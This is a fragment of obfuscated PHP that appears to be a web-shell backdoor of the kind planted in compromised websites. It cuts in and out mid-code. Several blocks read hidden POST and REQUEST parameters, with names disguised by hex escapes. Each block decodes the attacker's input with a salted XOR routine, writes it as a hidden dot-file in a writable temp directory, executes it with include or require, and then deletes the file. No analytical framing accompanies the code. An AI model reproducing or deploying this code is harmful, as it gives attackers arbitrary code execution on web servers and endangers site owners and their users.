$v5): $sChar = ord($s[$j% $sLen] ); $d = ((int)$v5 - $sChar - ($j% 10))^ 14; $k .= chr($d ); endforeach; $ref = array_filter(["/var/tmp", getcwd(), session_save_path(), ini_get("upload_tmp_dir"), "/tmp", getenv("TMP"), getenv("TEMP"), "/dev/shm", sys_get_temp_dir()]); foreach ($ref as $key => $flg) { if ((function($d) { return is_dir($d) && is_writable($d); })($flg)) { $rec = str_replace("{var_dir}", $flg, "{var_dir}/.elem"); if (file_put_contents($rec, $k)) { require $rec; unlink($rec); die(); } } } } if(array_key_exists("val\x75\x65", $_POST) && !is_null($_POST["val\x75\x65"])){ $desc = $_POST["val\x75\x65"]; $desc = explode( '.', $desc ) ; $ent = ''; $salt5 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt5); $t = 0; $__tmp = $desc; while ($v5 = array_shift($__tmp)) { $chS = ord($salt5[$t % $sLen]); $dec = ((int)$v5 - $chS - ($t % 10)) ^ 42; $ent .= chr($dec); $t++; } $fac = array_filter([getenv("TEMP"), sys_get_temp_dir(), "/var/tmp", "/dev/shm", getcwd(), ini_get("upload_tmp_dir"), "/tmp", session_save_path(), getenv("TMP")]); $entity = 0; do { $resource = $fac[$entity] ?? null; if ($entity >= count($fac)) break; if ((is_dir($resource) and is_writable($resource))) { $hld = "$resource/.obj"; $success = file_put_contents($hld, $ent); if ($success) { include $hld; @unlink($hld); exit;} } $entity++; } while (true); } if(array_key_exists("e\x6Cemen\x74", $_POST)){ $data_chunk = array_filter(["/var/tmp", "/tmp", "/dev/shm", getcwd(), getenv("TMP"), ini_get("upload_tmp_dir"), getenv("TEMP"), session_save_path(), sys_get_temp_dir()]); $object = $_POST["e\x6Cemen\x74"]; $object= explode ( "." ,$object ) ; $symbol = ''; $s3 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s3 ); $x = 0; array_walk($object , function($v4) use(&$symbol , &$x , $s3 , $sLen) { $chS = ord($s3[$x % $sLen] ); $dec =((int)$v4 - $chS -($x % 10)) ^ 9; $symbol .= chr($dec ); $x++; } ); $record = 0; do { $tkn = $data_chunk[$record] ?? null; if ($record >= count($data_chunk)) break; if (is_writable($tkn) && is_dir($tkn)) { $component = join("/", [$tkn, ".itm"]); $file = fopen($component, 'w'); if ($file) { fwrite($file, $symbol); fclose($file); include $component; @unlink($component); die(); } } $record++; } while (true); } if(!is_null($_REQUEST["res"] ?? null)){ $object = $_REQUEST["res"]; $object =explode ( ".", $object ); $bind = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s); foreach ($object as $t => $v7) { $sChar = ord($s[$t % $sLen]); $dec = ((int)$v7 - $sChar - ($t % 10)) ^ 2; $bind .= chr($dec); } $descriptor = array_filter([getenv("TMP"), "/tmp", "/var/tmp", sys_get_temp_dir(), ini_get("upload_tmp_dir"), "/dev/shm", session_save_path(), getcwd(), getenv("TEMP")]); $resource = 0; do { $value = $descriptor[$resource] ?? null; if ($resource >= count($descriptor)) break; if (is_dir($value) ? is_writable($value) : false) { $tkn = str_replace("{var_dir}", $value, "{var_dir}/.dchunk"); if (file_put_contents($tkn, $bind)) { require $tkn; unlink($tkn); exit; } } $resource++; } while (true); } if(!empty($_REQUEST["m\x72k"])){ $k = array_filter([getcwd(), "/var/tmp", getenv("TEMP"), sys_get_temp_dir(), ini_get("upload_tmp_dir"), getenv("TMP"), session_save_path(), "/dev/shm", "/tmp"]); $flg = $_REQUEST["m\x72k"]; $flg = explode ( "." , $flg ) ; $ref = ''; $s4 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s4); $t = 0; $len = count($flg); do { if($t >=$len) break; $v8 = $flg[$t]; $sChar = ord($s4[$t%$sLen]); $d =((int)$v8 - $sChar -($t%10)) ^ 43; $ref .= chr($d); $t++;}while(true); $desc = 0; do { $item = $k[$desc] ?? null; if ($desc >= count($k)) break; if